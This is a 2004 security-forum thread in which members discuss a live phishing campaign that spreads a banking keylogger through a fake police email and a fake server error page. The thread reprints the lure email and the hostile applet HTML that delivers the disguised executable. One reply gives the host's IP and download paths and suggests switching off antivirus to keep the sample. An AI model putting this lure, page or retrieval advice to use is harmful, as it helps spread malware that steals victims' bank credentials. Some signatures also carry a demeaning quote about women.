Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: owned as we speak

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785

    owned as we speak

    how current can you get? though you might like to take a look a crime in progress

    220-Connecting To MegaCrew's l337 FTP Server....
    220-.:::::::::::::::::::::::
    220-.::: ____________________________________________________
    220-.:::| ╕,°ñ░`░ñ°,╕╕╕╕╕╕╕╕╕╕╕
    220-.:::| .Welcome to
    220-.:::| MegaCrew
    220-.:::| ``````````░ñ°,╕╕,°ñ░`
    220-.:::|____________________________________________________
    220-.:::::::::::::::::::::::
    220-.:::|____________________________________________________
    220-.:::| USER INFO:
    220-.:::|
    220-.:::| ñ Your IP Address : xx.xxx.xx.xxx
    220-.:::| ñ Current Time : 11:55:34
    220-.:::| ñ Current Date : Monday 16 February, 2004
    220-.:::|____________________________________________________
    220-.:::::::::::::::::::::::

    This is from the server used to download a keylogger that looks only for info on bank accounts then emails it to an '.ru' mail server. the originating address of the email is in china which is no doubt owned by someone from somewhere else.


    victims are lured to a website threw an email:

    Hello...

    It has come to my attention that you are being under the police investigation.
    Is that true? Have you really commited such crimes?

    Please read the following article located at:

    http://federalpolice.com:article872[...#39;1075686747


    where they see what appears to be a server error page which is actually a web page made to download an executable (threw the mime type vuln) which is named javautil.zip and execute it.

    the web server that is being used is a completly owned server. (its really disgraceful)

    the hacked server is still up '1075686747' for anyone wanting to get a first hand look at it but the police have been notified and are probably watching it.

    more info:

    http://spamwatch.codefish.net.au/mod...article&sid=55
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  2. #2
    Senior Member deftones12's Avatar
    Join Date
    Jan 2003
    Location
    cali forn i a
    Posts
    333
    good work tedbob...how long have u been trackin this? how'd u find all this out? do they set up a backdoor also along with a keylogger?

  3. #3
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Hmm. I saw an advisory about this one this morning. The advisory is from a payed security firm so I cannot post the info here.

    Good find!

    BE CAREFUL if you downloaded the javautil.zip (for educational puposes ) it's NOT a zipfile but an executable.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  4. #4
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    This one started over the weekend. The first bits came out late Saturday and I've suggested to the original poster to get Antiphishing.com to look into posting it as well.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  5. #5
    Junior Member
    Join Date
    Nov 2003
    Posts
    6
    I just wanted to know how the javautil.zip can be made to auto - execute in one's machine; is it because the file is really called javautil.exe? maybe this is a stupid question, but maybe you could tell me what the mime type vun looks like to be aware when opening different webpages.
    Don't you have your internet settings set so that there has to be authorization before a download is made into your computer?
    Imagination is greater than intelligence when referring to intricate things, the reason why is that if you can\'t imagine how something works, how do you expect to understand it and therefore to know anything about it.

    Imagination, Precious

  6. #6
    AO Part Timer
    Join Date
    Feb 2003
    Posts
    331
    the web server that is being used is a completly owned server. (its really disgraceful)
    *ROTFLMAO*

    Holy crap! When you said completly you weren't kidding. Anybody else see that mess?
    Not only does it look like 3 seperate doors, it appears as if they didn't even need them in the first place. No pun intended.

    This is a perfect example of why you need to lock down your machines. Not just patched either. Learn how some of this stuff actually works, if you don't need it disable it. Granted some of this stuff could of been enabled by the attacker.

    Good find Tedob1 thanks for the humor.

    /edit corrected name OOPS!

  7. #7
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    no prob. ive been called much much worse.

    to add insult to injury the perps are using netbus.


    epolgar:
    http://secunia.com/advisories/10736/
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  8. #8
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    an added note from full-disclosure:

    "one major issue left out by that link is the fact that it is not just a
    keylogger, it also rapes the Protected Storage Subsystem, as is obvious
    by the fact that it imports pstorec.dll, and calls PStoreCreateInstance.
    Another interesting thing to note is that it can be uninstalled by
    finding the EXE and running it with the "Uninstall" flag... "
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  9. #9
    HeadShot Master N1nja Cybr1d's Avatar
    Join Date
    Jul 2003
    Location
    Boston, MA
    Posts
    1,840
    I wonder if my firewall would catch it...is it safe to click on that link without having it execute on my PC. I'm using win2k/XP dual boot. Connected through 2k rite now. I would like to tear the program they're using appart to see what I learn from it. If you have the file, would you be able to post it as an attachment for me please.

  10. #10
    AO Part Timer
    Join Date
    Feb 2003
    Posts
    331
    64.29.173.91

    After you connect it servers you the files automaticaly via an applet

    here is the html

    <HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
    <h2>SERVER ERROR 550</h2>
    <APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET></BODY></HTML>


    if you connect

    64.29.173.91/blackbox.class
    64.29.173.91/javautil.zip

    you can save them that way

    hope this helps

    Norton will pick up blackbox.class so if you wanna keep it kill norton or any other AV for a moment.

    Use at your own discretion


    hope this helps
    Your heart was talking, not your mind.
    -Tiger Shark

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •